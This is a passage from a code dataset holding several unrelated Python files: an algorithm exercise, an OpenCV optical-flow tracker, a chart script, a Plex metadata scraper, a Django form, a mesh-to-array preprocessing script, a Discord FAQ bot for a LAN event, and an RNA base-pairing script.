tg - nums[j] >=0:\r\n dp[tg] += dp[tg-nums[j]]\r\n print(dp)\r\n\r\n return dp[-1]\r\n\r\n \r\n \r\n\r\nif __name__ == '__main__':\r\n test = Solution()\r\n print(test.combinationSum4([1,2,3],4))\r\n","sub_path":"combinationSum4.py","file_name":"combinationSum4.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"320870211","text":"import os\nimport math\nimport cv2\nimport numpy as np\nfrom view_database import read_rect, draw_circle\n\n\nclass lk_tracker(object):\n def __init__(self, image, rect):\n self.old_image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n self.fp = cv2.goodFeaturesToTrack(self.old_image, mask=None, maxCorners=200, qualityLevel=0.001, minDistance=9,\n blockSize=40)\n\n self.radius = 150\n self.rect = rect[0]\n self.cx = 0.5 * (self.rect[0] + self.rect[2])\n self.cy = 0.5 * (self.rect[1] + self.rect[3])\n a = []\n for x, y in self.fp[:, 0]:\n r = math.sqrt((x - self.cx) * (x - self.cx) + (y - self.cy) * (y - self.cy))\n if r < self.radius:\n a.append([x, y])\n b = np.array(a)\n self.fp = b.reshape(-1,1,2)\n self.new_image = None\n self.lk_params = dict(winSize=(30, 30),\n maxLevel=4,\n criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))\n\n self.p1 = None\n self.p2 = None\n self.status = None\n self.error = None\n\n def track(self, image):\n self.new_image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n if self.fp.size > 0:\n self.p1, self.status, self.error = cv2.calcOpticalFlowPyrLK(self.old_image, self.new_image, self.fp,\n None, **self.lk_params)\n self.old_image = self.new_image.copy()\n\n good_new = self.p1[self.status == 1]\n good_old = self.fp[self.status == 1]\n\n dx = 0\n dy = 0\n for i in range(len(good_new)):\n dx += (good_new[i][0] - good_old[i][0])\n dy += (good_new[i][1] - good_old[i][1])\n\n l = np.shape(good_old)[0]\n dx = dx / l\n dy = dy / l\n\n self.cx += dx\n self.cy += dy\n\n self.p2 = self.fp.copy()\n self.fp = good_new.reshape(-1, 1, 2)\n\n\n\n def draw(self, image):\n cv2.rectangle(image, (int(self.rect[0]), int(self.rect[1])),\n (int(self.rect[2]), int(self.rect[3])), (255, 255, 0))\n w = (self.rect[2] - self.rect[0]) / 2\n h = (self.rect[3] - self.rect[1]) / 2\n cv2.rectangle(image, (int(self.cx - w), int(self.cy - h)),\n (int(self.cx + w), int(self.cy + h)), (255, 255, 255))\n cv2.circle(image, (int(self.cx), int(self.cy)), self.radius, (255, 255, 255))\n if self.p1 is not None:\n i = 0\n for x, y in self.p1[:, 0]:\n xy = self.p2[i][0]\n cv2.circle(image, (x, y), 3, (0, 255, 255), -1)\n cv2.line(image, (x, y), (xy[0], xy[1]), (0, 0, 255))\n i += 1\n if self.p2 is not None:\n for x, y in self.p2[:, 0]:\n cv2.circle(image, (x, y), 3, (0, 255, 0), -1)\n\n\ndef view_track(path):\n tracker = None\n for f in os.listdir(path):\n f = os.path.join(path, f)\n baseName, ext = os.path.splitext(f)\n if ext == '.jpg':\n rect = read_rect(f)\n image = cv2.imread(f)\n if tracker is None:\n tracker = lk_tracker(image, rect)\n else:\n tracker.track(image)\n tracker.draw(image)\n if not rect is None:\n draw_circle(rect, image)\n cv2.imshow(\"track\", image)\n key = cv2.waitKey(0)\n if key == 27:\n break\n\n\nif __name__ == '__main__':\n path = \"G:\\\\database\\\\fluovisor\\\\track00029\\\\\"\n view_track(path)\n","sub_path":"lk_track.py","file_name":"lk_track.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"336164249","text":"'''\r\n-------------------------------------------------------------------------------\r\nREADME:\r\nVery short script used to visualize data collected from transfermarkt.de.\r\nFirst version only contains a bar chart. I will use this script to recreate\r\nmost if not all visualizations I made in Tableau Public.\r\n-------------------------------------------------------------------------------\r\n'''\r\nimport matplotlib\r\nfrom matplotlib import pyplot as plt\r\nimport pandas as pd\r\nimport os\r\nimport numpy as np\r\nfrom datetime import datetime\r\n\r\nstart_time = datetime.now()\r\n# Function to add label containing the value of a bar chart at it's end.\r\n# From official matplotlib documentation\r\ndef autolabel(rects, xpos=\"center\"):\r\n ha = {\"center\" : \"center\", \"right\" : \"left\", \"left\" : \"right\"}\r\n offset = {\"center\" : 0, \"right\" : 1, \"left\" : -1}\r\n\r\n for rect in rects:\r\n height = round(rect.get_height(), 2)\r\n ax.annotate(\"{}\".format(height),\r\n xy = (rect.get_x() + rect.get_width() / 2, height),\r\n xytext = (offset[xpos]*3, 3),\r\n textcoords = \"offset points\",\r\n ha = ha[xpos], va = \"bottom\")\r\n\r\nfp = os.getcwd() + \"\\\\Data\\\\Tier_1_Leagues.xlsx\"\r\n\r\n# Get all sheet names from Excel file. Store sheet names in list \"leagues\".\r\n# Append all sheets from file to pandas dataframe. Add nation in column \"league\"\r\nVAR = pd.read_excel(fp, sheet_name=None)\r\nleagues = [sheet for sheet in VAR.keys()]\r\ndf = pd.read_excel(fp)\r\ndf[\"League\"] = \"Germany\"\r\nfor league in leagues[1:]:\r\n VAR = pd.read_excel(fp, sheet_name=league)\r\n VAR[\"League\"] = league\r\n df = df.append(VAR, ignore_index=True)\r\n\r\n# Create bar chart using matplotlib\r\nfig, ax = plt.subplots()\r\n\r\nplt.xticks(rotation=45)\r\nfor league in leagues:\r\n t = ax.bar(df[\"League\"][df.League == league].sort_values(), df[\"Current_MV_EUR\"][df.League == league].mean() / 10**6)\r\n autolabel(t, \"center\")\r\n\r\nplt.title(\"Average Market Value Of Top 100 Players Per League\")\r\nplt.ylabel(\"AVG MV [mil. $]\")\r\n\r\nprint(\"Success!\")\r\nplt.show()\r\n\r\nprint(\"Done --- Time taken: \" + (str(datetime.now() - start_time)))\r\n","sub_path":"tm_vis.py","file_name":"tm_vis.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"236528160","text":"import PAsearchSites\nimport PAutils\n\n\ndef search(results, lang, siteNum, searchData):\n params = json.dumps({\n 'sortBy': 'MOST_RELEVANT',\n 'searchQuery': searchData.title,\n 'videoView': 'MEDIUM'\n })\n req = PAutils.HTTPRequest(PAsearchSites.getSearchSearchURL(siteNum), params=params, headers={'Content-Type': 'application/json'})\n searchResults = req.json()\n for searchResult in searchResults['contents']:\n releaseDate = parse(searchResult['released']).strftime('%Y-%m-%d')\n curID = PAutils.Encode(searchResult['videoUri'])\n posterID = PAutils.Encode(searchResult['mainImageSrcset'].split(',')[1][:-3].replace('https', 'http'))\n siteName = PAsearchSites.getSearchSiteName(siteNum)\n titleNoFormatting = '%s [%s] %s' % (searchResult['title'], siteName, releaseDate)\n\n if searchData.date:\n score = 100 - Util.LevenshteinDistance(searchData.date, releaseDate)\n else:\n score = 100 - Util.LevenshteinDistance(searchData.title.lower(), titleNoFormatting.lower())\n\n results.Append(MetadataSearchResult(id='%s|%d|%s' % (curID, siteNum, posterID), name=titleNoFormatting, score=score, lang=lang))\n\n return results\n\n\ndef update(metadata, lang, siteNum, movieGenres, movieActors, art):\n metadata_id = str(metadata.id).split('|')\n sceneURL = PAutils.Decode(metadata_id[0])\n if not sceneURL.startswith('http'):\n sceneURL = PAsearchSites.getSearchBaseURL(siteNum) + \"/\" + sceneURL\n posterUri = PAutils.Decode(metadata_id[2])\n req = PAutils.HTTPRequest(sceneURL)\n detailsPageElements = HTML.ElementFromString(req.text)\n\n movieGenres.clearGenres()\n movieActors.clearActors()\n\n # Title\n metadata.title = detailsPageElements.xpath('//h1[@class=\"video-detail-name\"]')[0].text_content().strip()\n\n # Summary\n rawSummary = detailsPageElements.xpath('//p[@itemprop=\"description\"]')[0].text_content().replace('…', '').replace('Read more', '')\n metadata.summary = ' '.join(rawSummary.split())\n\n # Studio\n metadata.studio = PAsearchSites.getSearchSiteName(siteNum)\n\n # Tagline and Collection(s)\n metadata.collections.clear()\n metadata.tagline = metadata.studio\n metadata.collections.add(metadata.studio)\n\n # Release Date\n date = detailsPageElements.xpath('//span[@class=\"videoClip__Details-infoValue\"]')[0].text_content().strip()\n if date:\n date_object = parse(date)\n metadata.originally_available_at = date_object\n metadata.year = metadata.originally_available_at.year\n\n # Genres\n for genreLink in detailsPageElements.xpath('//span[@itemprop=\"keywords\"]/a'):\n genreName = genreLink.text_content().strip().lower()\n movieGenres.addGenre(genreName)\n\n # Actors\n actors = detailsPageElements.xpath('//span[@itemprop=\"actors\"]/a')\n for actorLink in detailsPageElements.xpath('//span[@itemprop=\"actors\"]/a'):\n actorName = actorLink.text_content().strip()\n actorPhotoURL = ''\n\n try:\n actorPageURL = actorLink.get('href')\n req = PAutils.HTTPRequest(actorPageURL)\n actorPage = HTML.ElementFromString(req.text)\n actorPhotoLinks = actorPage.xpath('//img[@class=\"girlDetails-posterImage\"]/@srcset')[0]\n actorPhotoURL = actorPhotoLinks.split(',')[1][:-3].replace('https', 'http')\n except:\n pass\n\n movieActors.addActor(actorName, actorPhotoURL)\n\n # Photos\n for photo in detailsPageElements.xpath('//img[contains(@class, \"videoClip__Details--galleryItem\")]/@data-big'):\n photoURLs = photo.split(',')\n photoURL = photoURLs[len(photoURLs) - 1][:-6].replace('https', 'http')\n\n art.append(photoURL)\n\n Log('Artwork found: %d' % len(art))\n for idx, posterUrl in enumerate(art, 1):\n if not PAsearchSites.posterAlreadyExists(posterUrl, metadata):\n # Download image file for analysis\n try:\n image = PAutils.HTTPRequest(posterUrl)\n im = StringIO(image.content)\n resized_image = Image.open(im)\n width, height = resized_image.size\n # Add the image proxy items to the collection\n if width > 1:\n # Item is a poster\n metadata.posters[posterUrl] = Proxy.Media(image.content, sort_order=idx)\n if width > 100:\n # Item is an art item\n metadata.art[posterUrl] = Proxy.Media(image.content, sort_order=idx)\n except:\n pass\n\n return metadata\n","sub_path":"Contents/Code/siteRealityLovers.py","file_name":"siteRealityLovers.py","file_ext":"py","file_size_in_byte":4590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"15191382","text":"# scale/forms.py\nfrom django import forms\nfrom models import Scale\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass ScaleForm(forms.ModelForm):\n\n class Meta:\n model = Scale\n fields = ('name_scale', 'is_active')\n labels = {\n 'name_scale': _('Scale Name'),\n 'is_active': _('Is Active?'),\n }\n","sub_path":"scale/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"458590894","text":"\n\"\"\"\n-------------------------------------------------------------------------------------------------\nAuthor: Patil Aakash (aakash.patil@mines-paristech.fr) \nFrom Library: PyTransport \nYear: March, 2020 \n-------------------------------------------------------------------------------------------------\n\"\"\"\n\n\n\n#case and results location\ncase_dir = '../case_sample'\nresultats_dir = case_dir+'/resultats/2d/' \n\n\n#re-sampling grid nx and ny\nTnx, Tny = 360, 300\n\n\n############## Import libs: SYS, LOCAL, USER ##############\nimport os\nimport glob\nimport numpy as np\nfrom tqdm import tqdm\nfrom Lib_PyTransport import *\n##############################################################\n\n#get list of all result files\nfileListVTU = sorted(glob.glob(resultats_dir+'bulles*.vtu'))\nprint(\"Found \",len(fileListVTU) ,\".vtu files. \\n First file: \",fileListVTU[0] ,\"\\n Last file: \", fileListVTU[-1] )\n\n\n#get node info from original VTU / init VTU \ninputVTU = fileListVTU[0]\nbounds = getVTUBounds(inputVTU) \n\n\ntry:\n structDict, coordinates_structList = TransportVTU2Struct_2d(inputVTU,arrayName='ALL', nx=Tnx, ny=Tny, outputFile=None, returnDict=True)\n struct_Velocity = structDict['VitesseP1']\n print(\"struct_Velocity.shape \",struct_Velocity.shape)\nexcept:\n raise NameError(\"** ERROR Some issue with \", inputVTU) \n\n\n#convert all vtu unstruct results to struct arrays \nbigArr = np.zeros((len(fileListVTU), Tnx, Tny, 5))\nfor t in tqdm(range(len(fileListVTU))):\n vtuFile = fileListVTU[t]\n print(\"Reading and Converting: \", vtuFile)\n structDict, coordinates_structList = TransportVTU2Struct_2d( vtuFile, arrayName='ALL', nx=Tnx, ny=Tny, outputFile=None, returnDict=True)\n bigArr[t, :, :, :2] = structDict['VitesseP1'][:,:,:2]\n bigArr[t, :, :, 2] = structDict['PressionP1']\n bigArr[t, :, :, 3] = structDict['NuTildeP1']\n bigArr[t, :, :, 4] = structDict['MuTurbP1']\n \n \n#save in format [N, nx, ny, ch] \nnp.save(\"dataset.npy\", bigArr)\n\nprint(\"Done converting. Output saved to dataset.npy\")\n\n\n\n\n\n\n \n\n\n\n","sub_path":"transport/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"156513107","text":"import discord\nimport aiohttp\nimport filehandler as io\nimport discordutils as dcf\nimport parseutils as pu\nimport scraper as sc\nimport datetime\nimport subprocess\nimport sys\nimport languageki as ki\nimport readme as rtfmgen\n\nimport time\nimport random\nimport bs4 as bs\nfrom discord.ext import commands\n\nprefixes = [\"d!\", \"f!\", \"fe!\"]\nbot = commands.Bot(command_prefix=prefixes)\nbot.remove_command(\"help\")\n\n#define the filepath\nfilepath = './files/'\n\n#open the commands xml\nroot = io.readXML(filepath,'data.xml')\nprint(\"XML file read \\n\")\n\n#ids for dreamhack int color code and faq channel, as well as permission denied message\ndhorange = 16738079\nfaqchannel = \"<#376765597226106890>\"\nauthfailed = \"I\\'m sorry Dave, I\\'m afraid I can\\'t do that.\"\nunknown_de = \"Den Befehl kenne ich leider nicht. Schau doch mal in meiner Befehlsübersicht nach:\"\nunknown_en = \"I don't recognize that command. Try checking my commandlist:\"\nmirnemoji = \"DHCactus\"\nmirnchance = 42\nmsgchan = None\nfaqcid = 484264883169525760\nintid = 183158280216903680\nrandomuid = 214832573392748544 \n\n#initialize users and emoji\nmirn = None\nmegauser = None\nadmin = None\nmanager = None\nfaqdm = None\nfaqmsgchan = None\nmessagechannel = None\ndhserv = None\ninternal = None\nmembed = None\n\n#antispam variable\nlast = datetime.datetime.now()\nlastauto = datetime.datetime.now()\nspamdelay = 20\nautodelay = 30\n\nqreply = [\n \"\",\n \"Sitzplatzreservierung? Mitte Dezember!\",\n \"Da schauste am besten mal mit f!aq Pavilion nach.\",\n \"Für die Turniere ist grad noch nix genaues bekannt, aber vielleicht kommt ja bald was!\",\n \"Nee ... Lass die mal zu Hause ...\",\n \"Wir reden hier nicht von dir...\",\n \"Nein, Kühlschränke sind nicht erlaubt. Draußen ist doch im Februar kalt genug ...\"\n]\n\n#read faq commands\ncomm_de = io.fetch(root, 'cde')\ncomm_en = io.fetch(root, 'ceng')\n\nprint(\"Command lists read.\\n\")\n\nprint(\"German Commands:\"+str(comm_de))\nprint(\"English Commands:\"+str(comm_en))\n\n#generate uppercase commands from lists\ncomm_de_upper = [s.upper() for s in comm_de]\ncomm_en_upper = [s.upper() for s in comm_en]\n\n\n#read in questions and parse the text (formating and replacing)\nq_de = io.fetchTXT(root, 'qde')\nq_en = io.fetchTXT(root, 'qeng')\nprint(\"Questions read and processed.\\n\")\n\n\n#read in answers and parse the text (formating and replacing)\na_de = io.fetchTXT(root, 'ade')\na_en = io.fetchTXT(root, 'aeng')\nprint(\"Answers read and processed.\\n\")\n\n\n#read a user list for voting\nul = io.getUserList(filepath)\nprint(\"Userlist read.\\n\")\n\nprint('------\\n')\n\n#generating strings for help commands\nhelp_de = pu.gString(comm_de)\nhelp_en = pu.gString(comm_en)\n\n#open the token file and mirn counter\nTOKEN = io.getToken(filepath)\nADMIN = io.getAdmin(filepath)\nfaquid = io.getFeed(filepath)\nmc = io.getVal(filepath, 'mirn.dcbt')\n\nprint(\"Loading Mirns: \" + str(mc) +\"\\n\")\n\nprint(\"Logging in...\\n\")\n\n#returns the server object\ndef fetchServer(id):\n server = bot.get_guild(id)\n return server\n\n#define the status message of the bot\nasync def GameChanger():\n await bot.change_presence(game=discord.Game(name=\"f!help | fe!help\"))\n return\n\n#sends an embed message\nasync def sendEmbed(channelObject, embedObject):\n await channelObject.send(\" \", embed=embedObject)\n return\n\n#downtime Check\nasync def DownTime():\n async for message in internal.history(limit=50): #find last message by bot (restarting, etc)\n if message.author == bot.user: \n timeObject1 = message.created_at #create time object of last message\n break\n await internal.send(\"Bot Online\")\n async for message in internal.history(limit=1): #create time object of newest bot message (Online)\n timeObject2 = message.created_at\n downtime = pu.dateProcess(timeObject2, timeObject1) #calculate time difference in minutes\n await internal.send(\"Downtime: \" + downtime) #send time difference\n return\n\n@bot.command(name=\"restart\")\nasync def restart(ctx):\n if ctx.prefix == \"d!\":\n if ctx.author.id == ADMIN:\n await ctx.message.channel.send(\"Restarting...\")\n subprocess.Popen([sys.executable, \"./restart.py\"])\n await bot.close()\n return\n for i in range(len(ctx.author.roles)):\n if ctx.author.roles[i] == admin:\n await ctx.message.channel.send(\"Restarting...\")\n subprocess.Popen([sys.executable, \"./restart.py\"])\n await bot.close()\n return\n\n@bot.command(name=\"rtfm\")\nasync def rtfm(ctx):\n if ctx.prefix == \"d!\":\n if ctx.author.id == ADMIN:\n async for message in ctx.channel.history(limit=50):\n if message.author == bot.user:\n await message.delete()\n faq, titles = rtfmgen.generatePost()\n for i in range(len(faq)):\n await ctx.message.channel.send(titles[i], embed=None)\n await ctx.message.channel.send(\"\", embed=faq[i])\n return\n\n@bot.command(name=\"cln\")\nasync def cln(ctx):\n if ctx.prefix == \"d!\":\n if ctx.author.id == ADMIN:\n async for message in ctx.channel.history(limit=99999):\n if message.author == ctx.author:\n await message.delete()\n\n@bot.command(name=\"update\")\nasync def update(ctx):\n if ctx.prefix == \"d!\":\n if ctx.author.id == ADMIN:\n await ctx.message.channel.send(\"Updating...\")\n subprocess.Popen([sys.executable, \"./update.py\"])\n await bot.close()\n return\n for i in range(len(ctx.author.roles)):\n if ctx.author.roles[i] == admin:\n await ctx.message.channel.send(\"Updating...\")\n subprocess.Popen([sys.executable, \"./update.py\"])\n await bot.close()\n return\n\n@bot.command(name=\"ban\")\nasync def ban(ctx):\n if ctx.prefix == \"d!\":\n if ctx.author.id == ADMIN:\n banid = dcf.fetchUser(dhserv, ctx)\n await banid.ban(banid, reason=None, delete_message_days=0)\n await ctx.message.channel.send(str(banid) + \" was banned from the server.\")\n return\n\n#define the different commands\n@bot.command(name=\"shutdown\")\nasync def shutdown(ctx):\n if ctx.prefix == \"d!\":\n if ctx.author.id == ADMIN:\n await ctx.send(\"Shutting down...\")\n await bot.close()\n else:\n await ctx.message.channel.send(authfailed)\n print(str(ctx.author) + \" tried to access command d!shutdown!\")\n return\n\n\n@bot.command(name=\"help\")\nasync def help(ctx):\n if ctx.prefix == \"f!\":\n await sendEmbed(ctx.message.channel, dcf.helpDE(help_de))\n return\n elif ctx.prefix == \"fe!\":\n await sendEmbed(ctx.message.channel, dcf.helpEN(help_en))\n return\n\n@bot.command(name=\"remaining\")\nasync def remaining(ctx):\n if ctx.prefix == \"f!\":\n remaining, sold, maxt = sc.crawlTickets()\n remst = str(sold) + \" / \" + str(maxt)\n verst = str(remaining)\n embed = discord.Embed(color=dhorange)\n embed.add_field(name=\"Verkaufte Tickets:\", value=remst, inline=False)\n embed.add_field(name=\"Verbleibende Tickets:\", value=verst, inline=False)\n await ctx.send(\" \", embed=embed)\n else:\n return\n\n@bot.command(name=\"aber\")\nasync def aber(ctx):\n if ctx.prefix == \"d!\":\n for i in range(len(ctx.author.roles)):\n if ctx.author.roles[i] == megauser or ctx.author.roles[i] == admin or ctx.author.roles[i] == manager:\n embed = discord.Embed(color=dhorange)\n string = ctx.message.content[7:]\n embed.add_field(name=\"Aber ...\", value = \"...was ist mit \" + str(string)+\"?\")\n embed.set_image(url=\"https://media.giphy.com/media/xT0xeA1Eq7jidwWBoc/giphy.gif\")\n await ctx.message.channel.send(\" \", embed=embed)\n return\n else:\n await ctx.message.channel.send(authfailed)\n print(ctx.message.author + \" tried to access command d!aber!\")\n return\n\n@bot.command(name=\"embed\")\nasync def embed(ctx):\n if ctx.prefix == \"d!\":\n if ctx.author.id == ADMIN:\n global msgchan\n embed = discord.Embed(color=dhorange)\n message = str(ctx.message.content)\n message = message[7:]\n embed.add_field(name=\"...\", value = message)\n await msgchan.send(\"\", embed=embed)\n return\n else:\n await ctx.message.channel.send(authfailed)\n print(ctx.message.author + \" tried to access command d!embed!\")\n return\n\n#FAQ Command\n@bot.command(name=\"aq\")\nasync def aq(ctx, arg1):\n if ctx.prefix == \"f!\": #check for german prefix\n gmsg = pu.faqParse(arg1) #parse the message (unleet, upper, fancy stuff)\n ph = pu.checkCommN(comm_de_upper, gmsg) #check for existing command\n if ph is not False: #generate and send a reply to the faq command\n await sendEmbed(ctx.message.channel, dcf.FAQ(q_de[ph], a_de[ph], dhorange)) \n return\n else: #generate and send a help embed if the command is not found\n await ctx.send(unknown_de, embed=dcf.helpDE(help_de))\n print(str(ctx.message.author)+ \" used an unknown command (\" +str(ctx.message.content)+\")\")\n return\n\n if ctx.prefix == \"fe!\": #check for english prefix\n emsg = pu.faqParse(arg1) #parse the message (unleet, upper, etc)\n ph = pu.checkCommN(comm_en_upper, emsg) #check for existing command\n if ph is not False: #generate and send a reply to the faq command\n await sendEmbed(ctx.message.channel, dcf.FAQENG(q_en[ph], a_en[ph], dhorange))\n return\n else: #generate and send a help embed if the command is not found\n await ctx.send(unknown_en, embed=dcf.helpEN(help_en))\n print(str(ctx.message.author)+ \" used an unknown command (\" +str(ctx.message.content)+\")\")\n return\n\n#check how many mirns were posted in the welcome\n@bot.command(name=\"mirn\")\nasync def mirnn(ctx):\n if ctx.prefix == \"d!\":\n embed = discord.Embed(color=dhorange)\n dcf.addEmbed(embed, \"Mirns im Welcome: \", mc)\n await ctx.message.channel.send(\" \", embed=embed) \n\n#set a channel for the bot to communicate in \n@bot.command(name=\"setchannel\")\nasync def setchannel(ctx, arg):\n if ctx.prefix == \"d!\":\n if ctx.message.author.id == ADMIN:\n global msgchan\n msgchan = bot.get_channel(int(arg))\n print(\"Channel set to: \" + str(msgchan))\n else:\n await ctx.message.channel.send(authfailed)\n print(str(ctx.message.author) + \" tried to access admin restricted command d!setchannel!\")\n\n\n@bot.command(name=\"msg\")\nasync def sendmsg(ctx):\n if ctx.prefix == \"d!\":\n if ctx.message.author.id == ADMIN:\n botstring = str(ctx.message.content)\n botstring = botstring[5:]\n await msgchan.send(botstring)\n return\n else: \n await ctx.channel.send(authfailed)\n print(str(ctx.message.author) + \" tried to access admin restricted command d!msg!\")\n\n\n@bot.command(name=\"mupdate\")\nasync def mirnupdate(ctx):\n if ctx.prefix == \"d!\":\n if ctx.message.author.id == ADMIN:\n mc = 0\n chann = bot.get_channel(137246928227270656)\n async for message in chann.history(limit=99999999999999999999):\n msg = message.content\n str(msg[:6])\n msg = msg.upper()\n if msg[:4] == \"MIRN\" or msg[:6] == \"MIRGEN\":\n mc +=1\n print(str(mc), end=\"\\r\")\n print(\"Total Number of Mirns: \"+str(mc))\n io.writeVal(filepath, 'mirn.dcbt', mc)\n else:\n await ctx.message.channel.send(authfailed)\n print(str(ctx.message.author) + \" tried to access admin restricted command d!mupdate!\")\n\n@bot.command(name=\"eedback\")\nasync def feedback(ctx):\n if ctx.prefix == \"f!\":\n author = \"<@\"+str(ctx.message.author.id)+\">\"\n creation = pu.createDate(ctx.message.created_at)\n header = \"Neues Feedback vom \" + creation\n message = pu.feedString(str(ctx.message.content))\n feedback = \"Feedback von User: {} \\n\\n\".format(author)\n feedback = feedback + message\n print(\"Der User \"+str(ctx.message.author)+\"hat Feedback hinterlassen!\")\n embed = discord.Embed(color=dhorange)\n dcf.addEmbed(embed, header, feedback)\n await faqdm.send(\" \", embed = embed)\n await faqmsgchan.send(\" \", embed = embed)\n\n@bot.command(name=\"onnerstag\")\nasync def donnerstag(ctx):\n if ctx.prefix == \"d!\":\n global ul\n for user in ul:\n if ctx.message.author.id == user:\n await ctx.message.channel.send(\"Du hast bereits abgestimmt!\") \n return\n\n ul.append(ctx.message.author.id)\n io.writeUserList(filepath, ul)\n await ctx.message.channel.send(\"Stimme registriert!\") \n return\n\n@bot.command(name=\"checkvote\")\nasync def checkvote(ctx):\n if ctx.prefix == \"d!\":\n embed = discord.Embed(color=dhorange)\n dcf.addEmbed(embed, \"Anzahl der User, die sich den Donnerstag wünschen: \", str(len(ul)))\n await ctx.message.channel.send(\" \", embed = embed)\n\n# message sending and stuff\n@bot.event\nasync def on_message(message):\n global last, spamdelay, qreply, autodelay, lastauto\n if message.author == bot.user:\n return\n \n await bot.process_commands(message)\n\n #mirn v2\n msg = message.content\n str(msg[:6])\n msg = msg.upper()\n if msg[:4] == \"MIRN\" or msg[:6] == \"MIRGEN\":\n global mc\n mc+=1\n io.writeVal(filepath, 'mirn.dcbt', mc)\n rnd = random.randint(1,100)\n print(str(message.author) + \" rolled: \" + str(rnd))\n if message.author.id == randomuid:\n await message.add_reaction(mirn)\n elif rnd < mirnchance:\n await message.add_reaction(mirn)\n return\n \n # qperc, topic, topicid = ki.nProcess(str(message.content))\n # if qperc >= 2:\n # if topicid > 0:\n # if (datetime.datetime.now()-lastauto).seconds > autodelay:\n # await message.channel.send(qreply[topicid])\n # lastauto = datetime.datetime.now()\n # print(str(message.author) + \" asked a question about: \" + str(topic))\n # return\n \n #if msg[:4] == \"MOIN\":\n # if (datetime.datetime.now()-last).seconds > spamdelay:\n # print(str(message.author) + \" said moin! OH NO!\")\n # await message.channel.send(\"Meinten sie: __mirn__?\")\n # last = datetime.datetime.now()\n # return\n \n #if msg[:5] == \"M OIN\" or msg[:5] == \"MO IN\" or msg[:5] == \"MOI N\":\n # if (datetime.datetime.now()-last).seconds > spamdelay:\n # print(str(message.author) + \" said moin! OH NO!\")\n # await message.delete()\n # await message.channel.send(\"Meinten sie: __mirn__?\")\n # last = datetime.datetime.now()\n # return\n \n #if msg[:6] == \"MORGEN\":\n # if (datetime.datetime.now()-last).seconds > spamdelay:\n # print(str(message.author) + \" said morgen! OH NO!\")\n # await message.channel.send(\"Meinten sie: __mirgen__?\")\n # last = datetime.datetime.now()\n # return\n \n#this is executed on startup\n@bot.event\nasync def on_ready():\n global mirn, megauser, admin, manager, faqmsgchan, faqdm, internal\n\n print('------')\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n print('------')\n await GameChanger()\n dhserv = fetchServer(137246928227270656)\n mirn = dcf.fetchEmoji(dhserv, mirnemoji)\n megauser = dcf.fetchRole(dhserv, \"LAN.megauser\")\n admin = dcf.fetchRole(dhserv, \"Certified Admin\")\n manager = dcf.fetchRole(dhserv, \"Certified Manager\")\n faqmsgchan = bot.get_channel(faqcid)\n internal = bot.get_channel(intid)\n faqdm = dcf.fetchUser(dhserv, faquid)\n await DownTime()\n\nbot.run(TOKEN, bot=True, reconnect=True)\n","sub_path":"faqbot.py","file_name":"faqbot.py","file_ext":"py","file_size_in_byte":16669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"249312912","text":"#!/usr/bin/env python3\n# The following create a dict where is listed every match of bp on a seq\n# But it doesn't represent perfect matching\n \ndef fasta_parse(raw_data):\n \"\"\"Preprocess the entry fasta file. Return a list with header as even\n index number and sequences in a list as odd number index\"\"\"\n \n data = []\n for cell in raw_data:\n if len(cell):\n parts = cell.split()\n header = parts[0]\n seq = ''.join(parts[1:])\n data.append(header)\n data.append([seq])\n return data\n\ndef append_value(dict_obj, key, value):\n \"\"\"Add a value for a given key in a given dictionnary\"\"\"\n \n if key in dict_obj:\n if not isinstance(dict_obj[key], list):\n dict_obj[key] = [dict_obj[key]]\n dict_obj[key].append(value)\n else:\n dict_obj[key] = value\n \ndef check_edges(x, y, list_seq, dict_seq):\n \"\"\"Check if there is this no edge registered yet for x and y. \n Otherwise it return True\"\"\"\n \n result = False\n x_key = True\n if x not in list_seq:\n print('Uncorrect bp: '+x)\n return result\n if y not in list_seq:\n print('Uncorrect bp: '+y)\n return result\n \n if x not in dict_seq:\n #print(x + ' not a key yet')\n x_key = False\n \n if x_key == True and y in dict_seq[x]:\n result = True\n \n for key, value in dict_seq.items():\n if key == y and x in value:\n result = True\n \n return result\n \n \nif __name__ == '__main__':\n f = open('/Users/mathias.galati/Downloads/test.txt', 'r')\n raw_data = f.read().strip().split('>')\n data = fasta_parse(raw_data)\n seq = data[1][0]\n \n # Construction of index of every bp in the seq with its associated number\n bp = []\n i = 1\n for x in seq:\n bp.append(x+str(i))\n i+=1\n \n # Construction of dictionary of matching\n match = {}\n for x in bp:\n for y in range(len(bp)):\n if check_edges(x, bp[y], bp, match) == False :\n if x[0] == 'A' and bp[y][0] == 'U':\n append_value(match, x, bp[y])\n if x[0] == 'U' and bp[y][0] == 'A':\n append_value(match, x, bp[y])\n if x[0] == 'G' and bp[y][0] == 'C':\n append_value(match, x, bp[y])\n if x[0] == 'C' and bp[y][0] == 'G':\n append_value(match, x, bp[y])\n print(match)\n \n # Count every value in the match dictionnary\n count = 0\n for key, value in match.items(): \n if isinstance(value, list): \n count += len(value)\n else:\n count += 1\n print(count) \n","sub_path":"match_bonding.py","file_name":"match_bonding.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"342054676","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.models import auth\nfrom .models import *\nfrom django.contrib.auth.models import *\nfrom django.contrib import messages\nfrom django.core.files.storage import FileSystemStorage\nfrom django.core.mail 